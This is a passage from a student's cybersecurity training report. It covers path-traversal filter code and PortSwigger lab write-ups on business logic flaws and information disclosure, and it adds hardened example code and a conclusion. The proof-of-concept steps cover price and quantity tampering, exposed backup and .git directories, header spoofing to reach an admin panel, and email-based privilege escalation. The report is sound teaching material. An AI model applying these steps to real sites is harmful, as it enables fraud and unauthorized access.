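IMAGE_ROOT = "/var/www/images"   # constructed web-root subdirectory


def strip_traversal_once(name: str) -> str:
    """Lab 3's filter: removes '../' in a single pass, so '....//' collapses to
    '../' once the inner occurrence has been cut out."""
    return name.replace("../", "")


def decode_then_strip(name: str) -> str:
    """Lab 4's pipeline: URL-decode, filter, then the server decodes once more
    before opening the file. '%252e' passes the filter as the harmless '%2e'."""
    return unquote(strip_traversal_once(unquote(name)))


def resolve_image(name: str):
    """Hardened lookup. Returns the absolute path to open, or None when the
    request would escape IMAGE_ROOT. Absolute names (Lab 2) are refused
    outright; any '..' that survives is neutralised by normalising *before*
    the containment check, so the exact encoding trick does not matter."""
    name = unquote(name)   # decode exactly once (skip if the framework already did)
    if name.startswith("/") or "\x00" in name:
        return None
    full = posixpath.normpath(posixpath.join(IMAGE_ROOT, name))
    if full != IMAGE_ROOT and not full.startswith(IMAGE_ROOT + "/"):
        return None
    return full
```

On a real file system the same check is done on the canonical path (os.path.realpath, which also follows symlinks) and is paired with running the web server as a low-privilege user, so that even a bypass cannot read /etc/shadow or application secrets.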

6.7 Business Logic Vulnerability



Summary:

A Business Logic Vulnerability is a security flaw that arises when an attacker abuses the
intended behavior or flow of a web application’s business rules or processes to gain
unauthorized access, perform unintended actions, or cause disruption.

Unlike typical vulnerabilities (e.g., XSS, SQLi), BLVs do not exploit coding mistakes, but rather
flaws in how the system is designed to function.

Impact:

The impact can vary based on the business process being abused, but common consequences
include:

• Financial loss

• Privilege escalation

• Inventory manipulation

• Order tampering

• Reputation damage

• Data integrity issues

Mitigation:

1. Understand the business logic

2. Implement strict validation

3. Enforce proper access control

4. Use state machines or workflow engines

5. Security Testing

6. Rate limiting & anomaly detection

Lab 1 Excessive trust in client-side controls PoC

1. Open browser and navigate to https://0aec00a104a5b27c813b6b4b00f10074.web-security-academy.net/login
and log in to your account. Choose any product you want to buy and click on Place in cart while
intercepting the request

2. Navigate to the Intercept tab in the proxy server; 4 parameters were found:

a. productid

b. redir

c. quantity

d. price

Edit the price to 100, making the product cost $1, and navigate to the cart for checkout

Information Disclosure

Vulnerability Explanation:

Information disclosure, also known as information leakage, is when a website unintentionally
reveals sensitive information to its users. This information can be:

• Usernames and passwords

• Financial info.

• Technical details and infrastructure of the website

Severity:

• Low: Disclosure of internal IP addresses, server banners, or software versions without
known vulnerabilities.

• Medium: Leak of directory structures, internal usernames, database names, or partial
configuration files.

• High: Exposure of sensitive data such as PII, credentials (even hashed), session tokens,
or API keys.

• Critical: Full access to configuration backups, source code, or database dumps from
public endpoints.

Impact: (Depending on Severity)

• Low: Minor reconnaissance value

• Medium: Facilitates further targeted attacks

• High: Enables authentication bypass, impersonation, or lateral movement.

• Critical: Direct path to compromise; attackers can emulate or exploit core application
logic.

Prevention/Mitigation:

• Error handling & custom error messages

• Disable directory listing

• Secure configuration files

• Use secure communication

• Limit access to sensitive info.

• Audit any code for potential info. disclosure

PoC (1):

1. Open browser and navigate to https://0a7100130350d6bf8048679c000a0009.web-security-academy.net/

2. Click on View details

3. Edit the URL after the “=”

4. Resulting in an internal server error exposing the server version

PoC (2):

1. Open browser and navigate to https://0a6d006f04a080db81cf678e00f300a8.web-security-academy.net/
while Burp Suite is capturing traffic in the background

2. After the traffic is captured, select the root directory

3. Search for an HTML comment (<!--)

4. Now navigate to https://0a6d006f04a080db81cf678e00f300a8.web-security-academy.net/cgi-bin/phpinfo.php

POC (3):

1. Open browser and navigate to https://0a3d00f603bc5c918173d4ec006a0043.web-security-academy.net/

2. Edit the URL and add /robots.txt

3. The URL reveals a hidden backup directory (/backup)

4. Navigate to https://0a3d00f603bc5c918173d4ec006a0043.web-security-academy.net/backup

5. The /backup directory reveals admin database credentials

POC (4):

1. Open browser and navigate to https://0a7d004d034d1b1e828fd34600380038.web-security-academy.net/login
while HTTP history is on

2. Edit the URL and add /admin at the end of the URL

3. Results in

4. Navigate to the HTTP history, look for the request, right click on it and press Send to Repeater

5. Navigate to Repeater and change GET / to TRACE /

6. A response was made; notice X-Custom-IP-Authorization: 102.47.122.107 at the end of
the response

7. Navigate to Match and Replace in the Proxy tab in Burp Suite

8. Click Add, make sure the type is set to Request header, edit Replace and write
X-Custom-IP-Authorization: 127.0.0.1 and press OK

9. Press on Home and an admin panel should appear; clicking on it shows that
users can be deleted

POC (5):

1. Open Browser and navigate to https://0a5c0038044576798146bbd900ef009b.web-security-academy.net/

2. Add /.git at the end of the URL to reveal the index of /.git

3. Clone the Git repo using GitDumper:

• git clone https://github.com/internetwache/GitTools.git

• cd GitTools/Dumper

• ./gitdumper.sh https://0a5c0038044576798146bbd900ef009b.web-security-academy.net/.git/ /home/f0rg4d/

4. Navigate to the place of the saved repo (/home/f0rg4d/ in my case)

5. Run the command git log to show the latest commits made

6. Use git show 77a26a919c025020c2912c3bbe4359515364b4ae to reveal the commit
that was made, revealing sensitive information about the admin password
Lab 2 High-level logic vulnerability PoC

1. Open browser and navigate to https://0aec00a104a5b27c813b6b4b00f10074.web-security-academy.net/login
and log in to your account. Choose any product you want to buy and click on Place in cart while
intercepting the request

2. While viewing the request, 3 parameters were found:

a. productid

b. quantity

c. redir

Edit the quantity to -1 and try to check out, which gives an error message saying "Cart total
price cannot be less than zero", so add another item that brings the total to a positive value once
the negative units are deducted, then proceed to checkout.
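The server-side checks that Lab 1 (client-supplied price) and Lab 2 (negative quantity) are missing, as an added example that is not the lab's or the report's code. The catalogue, the prices (in cents), the quantity bound and the store credit are constructed for the demo.

```python
"""Added example (not from the report): cart logic that trusts the request beside
one that re-derives price and validates quantity on the server. Catalogue,
prices and limits are constructed.
"""
CATALOG = {1: ("Lightweight l33t leather jacket", 133700), 2: ("Mug", 500)}
MAX_QUANTITY = 99   # assumed policy value


def add_to_cart_vulnerable(cart: list, product_id: int, quantity: int, price_cents: int) -> None:
    """Labs 1 and 2: price and quantity are whatever the request says."""
    cart.append({"product_id": product_id, "quantity": quantity, "price_cents": price_cents})


def add_to_cart_hardened(cart: list, product_id: int, quantity: int) -> str:
    """Price comes from the catalogue; quantity must be a positive bounded int.
    Returns 'ok' or the reason the line was refused."""
    if product_id not in CATALOG:
        return "unknown product"
    if (not isinstance(quantity, int) or isinstance(quantity, bool)
            or not 1 <= quantity <= MAX_QUANTITY):
        return f"quantity must be between 1 and {MAX_QUANTITY}"
    cart.append({"product_id": product_id, "quantity": quantity,
                 "price_cents": CATALOG[product_id][1]})
    return "ok"


def cart_total(cart: list) -> int:
    return sum(line["quantity"] * line["price_cents"] for line in cart)


def checkout_vulnerable(cart: list, credit_cents: int) -> str:
    """The lab's only rule: the total may not be negative. A small positive
    total assembled from a negative line still goes through."""
    total = cart_total(cart)
    if total < 0:
        return "Cart total price cannot be less than zero"
    if total > credit_cents:
        return "insufficient credit"
    return "order placed"


def checkout_hardened(cart: list, credit_cents: int) -> str:
    """Re-validate every line at checkout (catalogue price, positive quantity)
    instead of trusting the stored cart, then compare the total with credit."""
    for line in cart:
        entry = CATALOG.get(line["product_id"])
        if entry is None or line["quantity"] < 1 or line["price_cents"] != entry[1]:
            return "cart tampered"
    if cart_total(cart) > credit_cents:
        return "insufficient credit"
    return "order placed"
```

Checking the invariant at the point of consequence (checkout) as well as at entry (add to cart) is what closes Lab 2: a rule that only says "total must not be negative" is satisfied by the tampered cart, whereas "every line must have a catalogue price and a positive quantity" is not.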
Lab 3 Inconsistent security controls PoC

1. Open browser and navigate to https://0a4c00c503a1365981044d4100810069.web-security-academy.net/register
and enter your username, a valid email and password. Take note of the prompt on the register form: If
you work for DontWannaCry, please use your @dontwannacry.com email address

2. After logging in to the account, a change email functionality is present with which I can change my
email from a normal user to an admin by adding my username to @dontwannacry.com, without any
credentials needed, giving me access to the admin panel
Conclusion
The summer training program on Cybersecurity at Digital Fortresses, in collaboration with the Higher
Technological Institute (HTI), has been a transformative experience, providing a comprehensive foundation in
the essential domains of modern information security. Over the course of the program, we explored a wide
range of topics, each contributing to a deeper understanding of both the fundamental principles and
advanced practices of cybersecurity.

The training began with a solid grounding in Network Fundamentals, where we developed a thorough
understanding of network architectures, protocols, and security mechanisms — critical for protecting
communication systems. This was followed by Information Gathering and Reconnaissance, which introduced
both passive and active techniques for identifying system vulnerabilities. We then progressed to Linux System
Administration and Bash Scripting, acquiring the skills to configure, secure, and manage Linux environments,
as well as automate administrative and security tasks to improve efficiency.

A core part of the program focused on Web Application Security Testing, where we examined common
vulnerabilities such as SQL Injection, Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF),
authentication bypass, and insecure direct object references (IDOR). Using industry-standard tools such as
Burp Suite, Nmap, and Metasploit, we learned practical exploitation methods alongside mitigation strategies,
reinforcing our understanding of secure application design and defense techniques.

The final phase of the program was dedicated to practical labs and projects, where we applied the knowledge
and skills gained to realistic cybersecurity scenarios. These projects tested our ability to think critically,
identify threats, and design effective solutions under real-world constraints.

In summary, this training has provided a well-rounded education in cybersecurity principles, tools, and
methodologies, equipping us with the skills needed to protect systems and networks in today’s evolving
threat landscape. The insights gained will serve as a strong foundation for both academic advancement and
professional success, enabling us to contribute effectively to the ever-growing field of information security.

References

1. OWASP Foundation. (2024). OWASP Top Ten Web Application Security Risks. Retrieved from
https://owasp.org/www-project-top-ten/
2. Scarfone, K., & Mell, P. (2007). Guide to Intrusion Detection and Prevention Systems (IDPS) (NIST
Special Publication 800-94). National Institute of Standards and Technology. Retrieved from
https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-94.pdf
3. OWASP Foundation. (2024). SQL Injection. Retrieved from https://owasp.org/www-
community/attacks/SQL_Injection
4. OWASP Foundation. (2024). Cross-Site Scripting (XSS). Retrieved from https://owasp.org/www-
community/attacks/xss/
5. OWASP Foundation. (2024). Command Injection. Retrieved from https://owasp.org/www-
community/attacks/Command_Injection
6. OWASP Foundation. (2024). Path Traversal. Retrieved from https://owasp.org/www-
community/attacks/Path_Traversal
7. OWASP Foundation. (2024). File Inclusion. Retrieved from https://owasp.org/www-
community/vulnerabilities/File_Inclusion
8. OWASP Foundation. (2024). Server-Side Request Forgery (SSRF). Retrieved from
https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
9. OWASP Foundation. (2024). Insecure Direct Object References (IDOR). Retrieved from
https://owasp.org/www-community/attacks/Insecure_Direct_Object_References
10. OWASP Foundation. (2024). Authentication Bypass. Retrieved from https://owasp.org/www-
community/attacks/Authentication_Bypass
11. Barrett, D., & Kipper, G. (2010). Virtualization and Forensics: A Digital Forensic Investigator’s
Guide to Virtual Environments. Syngress.
12. Skoudis, E., Liston, T., & Aitel, D. (2008). Counter Hack Reloaded: A Step-by-Step Guide to
Computer Attacks and Effective Defenses (2nd ed.). Prentice Hall.
13. Lyon, G. F. (2009). Nmap Network Scanning: The Official Nmap Project Guide to Network
Discovery and Security Scanning. Insecure.Com LLC.
14. PortSwigger Ltd. (2024). Burp Suite Documentation. Retrieved from
https://portswigger.net/burp/documentation
15. Offensive Security. (2024). Metasploit Unleashed. Retrieved from https://www.offensive-
security.com/metasploit-unleashed/
